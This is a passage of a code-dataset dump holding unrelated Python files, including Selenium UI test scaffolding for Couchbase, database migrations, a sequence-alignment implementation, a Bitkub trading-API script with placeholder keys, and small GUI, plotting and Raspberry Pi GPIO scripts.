obj.parse()\r\n self.assertEqual(parsed_output, self.golden_parsed_output)\r\n\r\n def test_ps_empty(self):\r\n self.maxDiff = None\r\n self.device = Mock(**self.empty_output)\r\n obj = Ps(device=self.device)\r\n parsed_output = obj.parse()\r\n self.assertEqual(parsed_output, {'pid': {}})\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","sub_path":"src/genie/libs/parser/linux/tests/test_ps.py","file_name":"test_ps.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"196557875","text":"from climatology import Streamlines, Velocities\nfrom matplotlib import cm\nimport matplotlib\nimport os\nimport sys\nimport numpy as np\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n# Script for making animations of velocity fields\n\n# Getting data file\ndata = np.genfromtxt('evol_field.dat', delimiter='')\n\n# Some animation settings\nstart = 0 # Index of starting frame\nend = int(3.e2) # Index of ending frame\ninterval = 0.1 # Delay between animation end in seconds\nstep = 1 # Index step between frames\n\n# Save Location\ncwd = os.getcwd()\nsave = cwd\n\n# Spatial resolution of animations\nnx = 35\nny = 30\n\n# Run dimensions\nams_dim = [6, 6]\noms_dim = [6, 6]\n\ntestVelocities = Velocities(data, ams_dim, oms_dim) # Animation object\n\n# 250 hPa Wind field animations\nif (sys.argv[1] == '3'): # Input specified in PBS script\n ugrid = testVelocities.u_grid('phi250', nx, ny, 0, end)\n vgrid = testVelocities.v_grid('phi250', nx, ny, 0, end)\n testVelocities.wind_field('phi250', ugrid, vgrid, 0, end, step=step, interval=interval, dimensions=True, datapath=save)\n\n# 750 hPa Velocities\nelif (sys.argv[1] == '2'):\n ugrid = testVelocities.u_grid('phi750', nx, ny, 0, end)\n vgrid = testVelocities.v_grid('phi750', nx, ny, 0, end)\n testVelocities.wind_field('phi750', ugrid, vgrid, 0, end, step=step, interval=interval, dimensions=True, datapath=save)\n\n# Ocean velocities\nelif (sys.argv[1] == '1'):\n ugrid = testVelocities.u_grid('phiOcean', nx, ny, 0, end)\n vgrid = testVelocities.v_grid('phiOcean', nx, ny, 0, end)\n testVelocities.wind_field('phiOcean', ugrid, vgrid, 0, end, step=step, interval=interval, dimensions=True, datapath=save)\n\nelse:\n print('No field input for wind field script.')\n","sub_path":"Post-process/wind-field-animations.py","file_name":"wind-field-animations.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"358083683","text":"\"\"\"\nAuthor : Robin Singh\nImplementation Of Naive Pattern Matching Algorithm\n\n\"\"\"\ndef BF(pattern, string1):\n index = []\n for i in range(len(string1)):\n j = 0\n while (j < len(pattern)):\n if (string1[i + j] != pattern[j]):\n break\n j += 1\n\n if (j == len(pattern)):\n index.append(i)\n return index\nif __name__ == '__main__':\n l1 = BF(\"in\", \"robin singh\")\n for i in range(len(l1)):\n print(f\"Found At Index : {l1[i]}\")\n\n\n\n\n","sub_path":"Algorithms/String Matching Algorithm/Naive_method.py","file_name":"Naive_method.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"318908761","text":"import random\nnumCol =4\nnumRow =4\n\nidx = [x for x in range (6)]\nrandIdx = []\nfor col in range (6):\n temp = random.randint(1,6)\n while temp in randIdx:\n temp = random.randint(1,6)\n randIdx.append(temp)\nboard = list(zip(idx, randIdx)) \nfor a in board:\n print (a) \n\nprint(\"SWAP\")\n\nnewBoard=[]\nidx2 = [x for x in range (6)]\nboard[0], board[1] = board[1], board[0]\nfor elem in board:\n newBoard.append(elem[1])\n\nfor a in list(zip(idx2, newBoard)):\n print (a)\n ","sub_path":"making_game_with_python/slide puzzle/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"106500776","text":"\"\"\"patients table\n\nRevision ID: d8990642ff3a\nRevises: b9c9cd698a49\nCreate Date: 2022-10-08 17:56:41.857118\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd8990642ff3a'\ndown_revision = 'b9c9cd698a49'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('patient',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('firstname', sa.String(length=64), nullable=True),\n sa.Column('lastname', sa.String(length=64), nullable=True),\n sa.Column('dob', sa.DateTime(), nullable=True),\n sa.Column('sex', sa.String(length=64), nullable=True),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.drop_index('ix_user_email', table_name='user')\n op.drop_index('ix_user_username', table_name='user')\n op.drop_table('user')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),\n sa.Column('username', sa.VARCHAR(length=64), autoincrement=False, nullable=True),\n sa.Column('email', sa.VARCHAR(length=120), autoincrement=False, nullable=True),\n sa.Column('password_hash', sa.VARCHAR(length=128), autoincrement=False, nullable=True),\n sa.PrimaryKeyConstraint('id', name='user_pkey')\n )\n op.create_index('ix_user_username', 'user', ['username'], unique=False)\n op.create_index('ix_user_email', 'user', ['email'], unique=False)\n op.drop_table('patient')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/d8990642ff3a_patients_table.py","file_name":"d8990642ff3a_patients_table.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"441679776","text":"import logger\nimport time\nimport unittest\nimport os\nimport urllib2\nimport commands\nimport types\nimport datetime\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.support.ui import WebDriverWait, Select\nfrom selenium.common.exceptions import NoSuchElementException\nfrom threading import Thread\nimport ConfigParser\nfrom TestInput import TestInputSingleton,TestInputParser, TestInputServer\nfrom couchbase_helper.cluster import Cluster\nfrom remote.remote_util import RemoteMachineShellConnection\nfrom membase.api.rest_client import RestConnection\nfrom membase.helper.bucket_helper import BucketOperationHelper\nfrom membase.helper.cluster_helper import ClusterOperationHelper\n\n\nclass BaseUITestCase(unittest.TestCase):\n # selenium thread\n\n def _start_selenium(self):\n host = self.machine.ip\n if host in ['localhost', '127.0.0.1']:\n os.system(\"java -jar %sselenium-server-standalone*.jar -Dwebdriver.chrome.driver=%s > selenium.log 2>&1\"\n % (self.input.ui_conf['selenium_path'], self.input.ui_conf['chrome_path']))\n else:\n self.shell.execute_command('{0}start-selenium.bat > {0}selenium.log 2>&1 &'.format(self.input.ui_conf['selenium_path']))\n\n def _kill_old_drivers(self):\n if self.shell.extract_remote_info().type.lower() == 'windows':\n self.shell.execute_command('taskkill /F /IM chromedriver.exe')\n self.shell.execute_command('taskkill /F /IM chrome.exe')\n\n def _wait_for_selenium_is_started(self, timeout=10):\n if self.machine.ip in ['localhost', '127.0.0.1']:\n start_time = time.time()\n while (time.time() - start_time) < timeout:\n log = open(\"/tmp/selenium.log\")\n if log.read().find('Started org.openqa.jetty.jetty.Server') > -1:\n log.close()\n if self._is_selenium_running():\n time.sleep(1)\n return\n time.sleep(1)\n else:\n time.sleep(timeout)\n\n def _start_selenium_thread(self):\n self.t = Thread(target=self._start_selenium,\n name=\"selenium\",\n args=())\n self.t.start()\n\n def _is_selenium_running(self):\n host = self.machine.ip\n if host in ['localhost', '127.0.0.1']:\n cmd = 'ps -ef|grep selenium-server'\n output = commands.getstatusoutput(cmd)\n if str(output).find('selenium-server-standalone') > -1:\n return True\n else:\n #cmd = \"ssh {0}@{1} 'bash -s' < 'tasklist |grep selenium-server'\".format(self.input.servers[0].ssh_username,\n # host)\n cmd = 'tasklist |grep java'\n o, r = self.shell.execute_command(cmd)\n #cmd = \"ssh {0}@{1} 'bash -s' < 'ps -ef|grep selenium-server'\"\n if str(o).find('java') > -1:\n return True\n return False\n\n def setUp(self):\n try:\n self.log = logger.Logger.get_logger()\n self.input = TestInputSingleton.input\n self.servers = self.input.servers\n self.browser = self.input.ui_conf['browser']\n self.replica = self.input.param(\"replica\", 1)\n self.case_number = self.input.param(\"case_number\", 0)\n self.cluster = Cluster()\n self.machine = self.input.ui_conf['server']\n self.driver = None\n self.shell = RemoteMachineShellConnection(self.machine)\n #avoid clean up if the previous test has been tear down\n if not self.input.param(\"skip_cleanup\", True) \\\n or self.case_number == 1:\n self.tearDown()\n self._log_start(self)\n self._kill_old_drivers()\n #thread for selenium server\n if not self._is_selenium_running():\n self.log.info('start selenium')\n self._start_selenium_thread()\n self._wait_for_selenium_is_started()\n self.log.info('start selenium session')\n if self.browser == 'ff':\n self.driver = webdriver.Remote(command_executor='http://{0}:{1}/wd/hub'\n .format(self.machine.ip,\n self.machine.port),\n desired_capabilities=DesiredCapabilities.FIREFOX)\n elif self.browser == 'chrome':\n self.driver = webdriver.Remote(command_executor='http://{0}:{1}/wd/hub'\n .format(self.machine.ip,\n self.machine.port),\n desired_capabilities=DesiredCapabilities.CHROME)\n self.log.info('start selenium started')\n self.driver.get(\"http://{0}:{1}\".format(self.servers[0].ip,\n self.servers[0].port))\n self.driver.maximize_window()\n except Exception as ex:\n self.input.test_params[\"stop-on-failure\"] = True\n self.log.error(\"SETUP WAS FAILED. ALL TESTS WILL BE SKIPPED\")\n self.fail(ex)\n\n @staticmethod\n def _log_start(self):\n try:\n msg = \"{0} : {1} started \".format(datetime.datetime.now(),\n self._testMethodName)\n RestConnection(self.servers[0]).log_client_error(msg)\n except:\n pass\n\n @staticmethod\n def _log_finish(self):\n try:\n msg = \"{0} : {1} finished \".format(datetime.datetime.now(),\n self._testMethodName)\n RestConnection(self.servers[0]).log_client_error(msg)\n except:\n pass\n\n def tearDown(self):\n try:\n if self.driver:\n path_screen = self.input.ui_conf['screenshots'] or 'logs/screens'\n full_path = '{1}/screen_{0}.png'.format(time.time(), path_screen)\n self.log.info('screenshot is available: %s' % full_path)\n if not os.path.exists(path_screen):\n os.mkdir(path_screen)\n self.driver.get_screenshot_as_file(os.path.abspath(full_path))\n rest = RestConnection(self.servers[0])\n if rest._rebalance_progress_status() == 'running':\n stopped = rest.stop_rebalance()\n self.assertTrue(stopped, msg=\"unable to stop rebalance\")\n BucketOperationHelper.delete_all_buckets_or_assert(self.servers, self)\n for server in self.servers:\n ClusterOperationHelper.cleanup_cluster([server])\n ClusterOperationHelper.wait_for_ns_servers_or_assert(self.servers, self)\n if self.driver:\n self.driver.close()\n except Exception as e:\n raise e\n finally:\n if self.driver:\n self.shell.disconnect()\n self.cluster.shutdown()\n\nclass Control():\n def __init__(self, selenium, by=None, web_element=None):\n self.selenium = selenium\n self.by = by\n if by:\n try:\n self.web_element = self.selenium.find_element_by_xpath(by)\n self.present = True\n if self.web_element is None:\n self.present = False\n except NoSuchElementException as ex:\n self.present = False\n else:\n self.web_element = web_element\n self.present = True\n\n def highlightElement(self):\n if self.by:\n self.selenium.execute_script(\"document.evaluate(\\\"{0}\\\",document,null,XPathResult.ANY_TYPE, null).iterateNext().setAttribute('style','background-color:yellow');\".format(self.by))\n\n def type_native(self, text):\n ActionChains(self.selenium).click(self.web_element).perform()\n ActionChains(self.selenium).key_down(Keys.CONTROL).perform()\n ActionChains(self.selenium).send_keys('a').perform()\n ActionChains(self.selenium).key_up(Keys.CONTROL).perform()\n ActionChains(self.selenium).send_keys(Keys.DELETE).perform()\n ActionChains(self.selenium).send_keys(text).perform()\n\n def click(self):\n self.highlightElement()\n self.web_element.click()\n\n def type(self, message):\n if message:\n self.highlightElement()\n self.web_element.clear()\n if type(message) == types.StringType and message.find('\\\\') > -1:\n for symb in list(message):\n if symb == '\\\\':\n self.web_element.send_keys(Keys.DIVIDE)\n else:\n self.web_element.send_keys(symb)\n else:\n self.web_element.send_keys(message)\n\n def check(self, setTrue=True):\n if setTrue:\n if not self.is_checked():\n self.click()\n else:\n if self.is_checked():\n self.click()\n\n def is_present(self):\n return self.present\n\n def is_displayed(self):\n return self.present and self.web_element.is_displayed()\n\n def is_checked(self):\n checked = self.web_element.get_attribute(\"checked\")\n return checked is not None\n\n def get_text(self):\n self.highlightElement()\n return self.web_element.text\n\n def get_attribute(self, atr):\n return self.web_element.get_attribute(atr)\n\n def select(self, label):\n element = Select(self.web_element)\n element.select_by_visible_text(label)\n\n def mouse_over(self):\n ActionChains(self.selenium).move_to_element(self.web_element).perform()\n\n def get_inner_html(self):\n return self.web_element.get_attribute(\"outerHTML\")\n\nclass ControlsHelper():\n def __init__(self, driver):\n self.driver = driver\n file = \"pytests/ui/uilocators.conf\"\n config = ConfigParser.ConfigParser()\n config.read(file)\n self.locators = config\n\n def find_control(self, section, locator, parent_locator=None, text=None):\n by = self._find_by(section, locator, parent_locator)\n if text:\n by = by.format(text)\n return Control(self.driver, by=by)\n\n def find_controls(self, section, locator, parent_locator=None):\n by = self._find_by(section, locator, parent_locator)\n controls = []\n elements = self.driver.find_elements_by_xpath(by)\n for element in elements:\n controls.append(Control(self.driver, web_element=element))\n return controls\n\n def find_first_visible(self, section, locator, parent_locator=None, text=None):\n by = self._find_by(section, locator, parent_locator)\n if text:\n by = by.format(text)\n controls = []\n elements = self.driver.find_elements_by_xpath(by)\n for element in elements:\n try:\n if element.is_displayed():\n return Control(self.driver, web_element=element)\n except StaleElementReferenceException:\n pass\n return None\n\n def _find_by(self, section, locator, parent_locator=None):\n if parent_locator:\n return self.locators.get(section, parent_locator) + \\\n self.locators.get(section, locator)\n else:\n return self.locators.get(section, locator)\n\nclass BaseHelperControls():\n def __init__(self, driver):\n helper = ControlsHelper(driver)\n self._user_field = helper.find_control('login', 'user_field')\n self._user_password = helper.find_control('login', 'password_field')\n self._login_btn = helper.find_control('login', 'login_btn')\n self._logout_btn = helper.find_control('login', 'logout_btn')\n self.error = helper.find_control('login', 'error')\n\nclass BaseHelper():\n def __init__(self, tc):\n self.tc = tc\n self.controls = BaseHelperControls(tc.driver)\n\n def login(self, user=None, password=None):\n self.tc.log.info(\"Try to login to application\")\n if not user:\n user = self.tc.input.membase_settings.rest_username\n if not password:\n password = self.tc.input.membase_settings.rest_password\n self.controls._user_field.type(user)\n self.controls._user_password.type(password)\n self.controls._login_btn.click()\n self.tc.log.info(\"user %s is logged in\" % user)\n\n def logout(self):\n self.tc.log.info(\"Try to logout\")\n self.controls._logout_btn.click()\n time.sleep(3)\n self.tc.log.info(\"You are logged out\")\n","sub_path":"testrunner/pytests/ui/uibasetest.py","file_name":"uibasetest.py","file_ext":"py","file_size_in_byte":12937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"218361079","text":"# -*- coding:utf-8 -*-\n# file: wxPythonPopupMenu.py\n#\nimport wx\t\t\t\t\t\t\t\t\t\t\t# 导入wxPython\nclass MyApp(wx.App):\t\t\t\t\t\t\t\t\t\t# 通过继承创建类\n\tdef OnInit(self):\t\t\t\t\t\t\t\t\t# 重载OnInit方法\n\t\tframe = wx.Frame(parent = None,title = 'wxPython',size = (300,170))\t\t# 生成框架窗口\n\t\tself.panel = wx.Panel(frame, -1)\t\t\t\t\t\t# 生成面板\n\t\tmenuBar = wx.MenuBar()\t\t\t\t\t\t\t\t# 创建菜单条\n\t\tself.menu = wx.Menu()\t\t\t\t\t\t\t\t# 创建菜单\n\t\topen = self.menu.Append(-1, 'Open')\n\t\tsave = self.menu.Append(-1, 'Save')\n\t\tself.menu.AppendSeparator()\t\n\t\tclose = self.menu.Append(-1, 'Close')\n\t\tmenuBar.Append(self.menu, '&File')\n\t\tframe.SetMenuBar(menuBar)\t\t\t\t\t\t\t# 向框架窗口中添加菜单\n\t\tself.Bind(wx.EVT_RIGHT_DOWN, self.OnRClick)\t\t\t\t\t# 绑定右键事件\n\t\tframe.Show()\n\t\treturn True\n\tdef OnRClick(self, event):\n\t\tpos = (event.GetX(),event.GetY())\t\t\t\t\t\t# 获得鼠标点击坐标\n\t\tself.panel.PopupMenu(self.menu, pos)\t\t\t\t\t\t# 显示菜单\napp = MyApp()\napp.MainLoop()\n","sub_path":"Python/PYTHON source code/第13章/wxPythonPopupMenu.py","file_name":"wxPythonPopupMenu.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"608135287","text":"apikey = 'afadaasafsdfasdfafadaasafsdfasdf' \r\napisecret = b'afadaasafsdfasdfafadaasafsdfasdf'\r\n\r\n#API KEY , API SECRET นำมาจากลิ้งค์นี้ https://www.bitkub.com/publicapi\r\n# ห้ามลบตัว b ออกหน้ารหัส ของ apisecret\r\n\r\nimport hashlib\r\nimport hmac\r\nimport json\r\nimport requests\r\n\r\n\r\n# API info\r\nAPI_HOST = 'https://api.bitkub.com'\r\nAPI_KEY = apikey\r\nAPI_SECRET = apisecret\r\n\r\ndef json_encode(data):\r\n\treturn json.dumps(data, separators=(',', ':'), sort_keys=True)\r\n\r\ndef sign(data):\r\n\tj = json_encode(data)\r\n\tprint('Signing payload: ' + j)\r\n\th = hmac.new(API_SECRET, msg=j.encode(), digestmod=hashlib.sha256)\r\n\treturn h.hexdigest()\r\n\r\n# check server time\r\nresponse = requests.get(API_HOST + '/api/servertime')\r\nts = int(response.text)\r\nprint('Server time: ' + response.text)\r\n\r\n# place ask\r\nheader = {\r\n\t'Accept': 'application/json',\r\n\t'Content-Type': 'application/json',\r\n\t'X-BTK-APIKEY': API_KEY,\r\n}\r\ndata = {\r\n\t'sym': 'THB_DOGE',\r\n\t'amt': 100, # amount you want to sell\r\n\t'rat': 0.27,\r\n\t'typ': 'limit',\r\n\t'ts': ts,\r\n}\r\nsignature = sign(data)\r\ndata['sig'] = signature\r\n\r\nprint('Payload with signature: ' + json_encode(data))\r\nresponse = requests.post(API_HOST + '/api/market/place-ask', headers=header, data=json_encode(data))\r\n\r\n\r\nprint('Response: ' + response.text)","sub_path":"bitkubsell.py","file_name":"bitkubsell.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"572613848","text":"import numpy as np\n\n# Idea from:\n # https://www.cs.cmu.edu/~ckingsf/bioinfo-lectures/gaps.pdf\n # https://www.cs.cmu.edu/~02710/Lectures/SeqAlign2015.pdf\n # https://www.cs.cmu.edu/~ckingsf/bioinfo-lectures/local.pdf\n\n# 3 scoring matrices keep track of gap openings and penalties\n# M stores the score of best alignment ending in a match\n# X stores the score of best alignment ending with gap in the first sequence\n# Y stores the score of best alignment ending with gap in the second sequence\n\n# Initialize empty scoring matrices \ndef make_matrices(dimA,dimB, gap_start, gap_extend):\n # Initialize empty matrices\n M = np.zeros((dimA, dimB))\n X = np.zeros((dimA, dimB))\n Y = np.zeros((dimA, dimB))\n # Introduce gap penalties on starting positions\n for i in range(1, dimA):\n M[i][0] = float(\"-inf\")\n X[i][0] = float(\"-inf\")\n Y[i][0] = gap_start + (i * gap_extend)\n for j in range(1, dimB):\n M[0][j] = float(\"-inf\")\n X[0][j] = gap_start + (i * gap_extend)\n Y[0][j] = float(\"-inf\")\n return M, X, Y\n\n# Fill all three matrices starting from top left corners\ndef score_matrix(seqA, seqB, similarityM, similarityS, gap_start, gap_extend):\n dimA = len(seqA) + 1\n dimB = len(seqB) + 1\n M, X, Y = make_matrices(dimB,dimA, gap_start, gap_extend)\n for j in range(1, dimA):\n for i in range(1, dimB):\n # get matching score from similarity matrix\n similarity = similarityM[similarityS.index(seqB[i-1])][similarityS.index(seqA[j-1])]\n # score of best alignment of x[1..i] and y[1..j] ending with a space in X\n X[i][j] = max((gap_start + gap_extend + M[i][j-1]), \n (gap_extend + X[i][j-1]), \n (gap_start + gap_extend + Y[i][j-1]))\n # score of best alignment of x[1..i] and y[1..j] ending with a space in Y\n Y[i][j] = max((gap_start + gap_extend + M[i-1][j]), \n (gap_start + gap_extend + X[i-1][j]), \n (gap_extend + Y[i-1][j]))\n # score of best alignment of x[1..i] and y[1..j] ending with a match\n M[i][j] = max(similarity + M[i-1][j-1], \n X[i][j], \n Y[i][j])\n return X, Y, M\n\n# Find the best path through the matrices starting at the bottom right corner\ndef backtrace(seqA, seqB, X, Y, M, similarityM, similarityS):\n finalA = \"\"\n finalB = \"\"\n i,j = len(seqB), len(seqA)\n while (i > 0 or j > 0):\n # Get match scores\n similarity = similarityM[similarityS.index(seqB[i-1])][similarityS.index(seqA[j-1])]\n # the position was a match, continue on the diagonal of the matrix M\n if (i > 0 and j > 0 and M[i][j] == M[i-1][j-1] + similarity):\n finalA = seqA[j-1] + finalA\n finalB = seqB[i-1] + finalB\n i -= 1 \n j -= 1\n # the position was a gap, continue in Y\n elif (i > 0 and M[i][j] == Y[i][j]):\n finalA = \"-\" + finalA\n finalB = seqB[i-1] + finalB\n i -= 1\n # the position was a gap, continue in X\n else: # (j > 0 and M[i][j] == X[i][j])\n finalA = seqA[j-1] + finalA\n finalB = \"-\" + finalB\n j -= 1\n return finalA, finalB\n\n\n# perform affine gap alignment \ndef align_sequences(seqA, seqB, similarityM, similarityS, gap_start, gap_extend):\n X, Y, M = score_matrix(seqA, seqB, similarityM, similarityS, gap_start, gap_extend)\n finalA,finalB = backtrace(seqA, seqB, X, Y, M, similarityM, similarityS)\n score = max(M[len(M)-1][len(M[0])-1], \n X[len(X)-1][len(X[0])-1], \n Y[len(Y)-1][len(Y[0])-1])\n return finalA, finalB, score\n\n# Given list of pairs, get alignment scores for set gap_start and gap_extend\ndef get_scores(base_path, pairL, gap_start, gap_extend, \n similarityM, similarityS, normalize=False): \n scores = [] \n for pair in pairL:\n positiveA, positiveB = pair\n seqA = read_fasta(base_path+positiveA)\n seqB = read_fasta(base_path+positiveB)\n gap_start = gap_start*-1\n gap_extend = gap_extend*-1\n alignedA, alignedB, score = align_sequences(seqA, seqB, similarityM, \n similarityS, gap_start, gap_extend)\n if (normalize):\n score = score/min(len(seqA), len(seqB))\n scores.append(score)\n return scores\n\n\n","sub_path":"hw3_code/align.py","file_name":"align.py","file_ext":"py","file_size_in_byte":4453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"199990672","text":"\"\"\" script to test the interrupt capacity of the pi to the teensy.\neventually will be used to simulate a trial on the treadmill. Pair with\n_2017-2-3_start_stop_trial_test.ino for the teensy. \"\"\"\n\nimport time\nimport RPi.GPIO as GPIO\nGPIO.setmode(GPIO.BCM)\n\ntime.sleep(1)\n\nstartPin = 17\nstopPin = 27\nledPin = 22\n\nGPIO.setup(startPin, GPIO.OUT)\nGPIO.setup(stopPin, GPIO.OUT)\nGPIO.setup(ledPin, GPIO.OUT)\n\n# define start notice function\n\ndef startup():\n set = ['ready', 'set', 'start']\n for i in set:\n GPIO.output(ledPin, GPIO.HIGH)\n time.sleep(.5)\n GPIO.output(ledPin, GPIO.LOW)\n time.sleep(.5)\n print(i)\n\nstartup()\n\nprint('Trigger Start')\nGPIO.output(startPin, GPIO.HIGH)\ntime.sleep(0.1)\nGPIO.output(startPin, GPIO.LOW)\nGPIO.output(ledPin, GPIO.HIGH)\nprint('triggered, now allow trial to continue for 10 seconds')\ntime.sleep(10)\nprint('End Trigger')\nGPIO.output(ledPin, GPIO.LOW)\nGPIO.output(stopPin, GPIO.HIGH)\ntime.sleep(.1)\nGPIO.output(stopPin, GPIO.LOW)\nGPIO.cleanup()\nprint('End Test')\n\n","sub_path":"interrupt_teensy_test.py","file_name":"interrupt_teensy_test.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"145859354","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('carrito', '0010_receipt'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='detailsale',\n name='tax',\n field=models.DecimalField(default=0, verbose_name=b'IVA', max_digits=10, decimal_places=2),\n ),\n migrations.AddField(\n model_name='sale',\n name='vendor',\n field=models.ForeignKey(related_name='vendor', verbose_name=b'vendedor', blank=True, to=settings.AUTH_USER_MODEL, null=True),\n ),\n migrations.AlterField(\n model_name='sale',\n name='user',\n field=models.ForeignKey(related_name='user', verbose_name=b'cliente', to=settings.AUTH_USER_MODEL),\n ),\n ]\n","sub_path":"carrito/migrations/0011_auto_20151226_0835.py","file_name":"0011_auto_20151226_0835.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"457602079","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 1 13:50:15 2017\n\n@author: owen\n\"\"\"\n\n#class Solution(object):\n# def readBinaryWatch(self, num):\n# \"\"\"\n# :type num: int\n# :rtype: List[str]\n# \"\"\"\n# def countOnes(n): # or use bin(x).count('1')\n# cnt=0\n# while n:\n# n&=(n-1)\n# cnt+=1\n# return cnt\n# \n# return [\"{:d}:{:02d}\".format(h,m) for h in range(12) for m in range(60) if countOnes(h)+countOnes(m)==num]\n \nclass Solution(object):\n def readBinaryWatch(self, num):\n \"\"\"\n :type num: int\n :rtype: List[str]\n \"\"\"\n res=[]\n for n in range(int(0b1011111011)+1): # 0:00-11:59\n h=n>>6\n m=n & 0x3F # bin(0x3f)='0b111111'\n if h<12 and m<60 and bin(h).count('1')+bin(m).count('1')==num:\n res.append('%d:%02d' %(h,m))\n return res\n \n \nif __name__==\"__main__\":\n print(Solution().readBinaryWatch(1))\n print(Solution().readBinaryWatch(4))","sub_path":"401. Binary Watch.py","file_name":"401. Binary Watch.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"429534248","text":"\"\"\"\n// Time Complexity : o(2^n)\n// Space Complexity : o(n)\n// Did this code successfully run on Leetcode : yes\n// Any problem you faced while coding this : no\n\n\"\"\"\n\nclass Solution:\n def helper(self, nums, path, idx):\n #base\n \n #logic:\n self.res.append(path.copy()) #add all the subsets to result\n for i in range(idx, len(nums)):\n path.append(nums[i]) #add the number encountered to the temp list, path\n \n self.helper(nums, path, i + 1)\n path.pop()#remove the last added number to path\n \n def subsets(self, nums: List[int]) -> List[List[int]]:\n self.res = [] #global\n self.helper(nums,[],0) #start from index 0\n return self.res","sub_path":"Problem1.py","file_name":"Problem1.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"348175060","text":"import functools\nimport numpy as np\nfrom xarray.plot.plot import _PlotMethods\n\n\ntry:\n import matplotlib.pyplot as plt\n from matplotlib.projections import PolarAxes\n HAS_MATPLOTLIB = True\nexcept ImportError:\n HAS_MATPLOTLIB = False\n\n\ndef spatial_map(darray, x, y, ax=None, scale=.1, dim='location',\n add_colorbar=True, figure_kw={}, subplot_kw={},\n **kwargs):\n '''Plot data on a spatial map\n\n Creates a subplot for each location in the DataArray and positions\n the subplot on a map. Connects events to both map axes and figure\n to keep the subplots positioned.\n\n Parameters\n ----------\n darray : xarray.DataArray\n DataArray with spatial information\n x : list\n Array with x-coordinates of locations\n y : list\n Array with y-coordinates of locations\n scale : float\n Size of subplots in axes coordinates\n dim : str\n Name of spatial dimensions\n figure_kw : dict\n Options passed to :func:`matplotlib.pyplot.subplots`\n subplot_kw : dict\n Options passed to :func:`matplotlib.pyplot.add_axes`\n kwargs : dict\n Options passed to :meth:`xarray.DataArray.plot`\n\n Returns\n -------\n ax_map : AxesSubplot\n Subplot containing the map\n axs : list of AxesSubplot\n Positionsed subplots visualizing data\n\n '''\n\n if not HAS_MATPLOTLIB:\n raise ImportError('Matplotlib not available')\n\n # create map axis\n if ax is None:\n fig, ax_map = plt.subplots(**figure_kw)\n ax_map.set_aspect('equal')\n else:\n ax_map = ax\n fig = ax.get_figure()\n\n # plot locations to set axis limits\n ax_map.scatter(x, y, c='none', edgecolor='none')\n\n # set default plot options\n plot_kw = {}\n if darray.ndim == 2:\n pass\n elif darray.ndim == 3:\n plot_kw.update(dict(add_colorbar=False,\n vmin = np.min(darray.values),\n vmax = np.max(darray.values)))\n elif darray.ndim == 4:\n pass\n plot_kw.update(**kwargs)\n\n # create a subplot for each location\n axs = []\n for i, (xi, yi) in enumerate(zip(x, y)):\n ax = fig.add_axes([0, 0, 1, 1], label=i, **subplot_kw)\n darray[{dim:i}].plot(ax=ax, **plot_kw)\n ax.coords = (xi, yi)\n ax.set_axis_off()\n\n axs.append(ax)\n\n # add colorbar\n if add_colorbar:\n meshes = [c\n for ax in axs\n for c in ax.get_children()\n if hasattr(c, 'autoscale')]\n if len(meshes) > 0:\n fig.colorbar(meshes[0], ax=ax_map)\n\n # set figure events to update subplot positions\n ax_map.callbacks.connect('xlim_changed', lambda x: position_subplots(ax_map, axs, scale=scale))\n ax_map.callbacks.connect('ylim_changed', lambda x: position_subplots(ax_map, axs, scale=scale))\n\n fig.canvas.mpl_connect('resize_event', lambda x: position_subplots(ax_map, axs, scale=scale))\n fig.canvas.mpl_connect('draw_event', lambda x: position_subplots(ax_map, axs, scale=scale))\n\n # set initial subplot positions\n 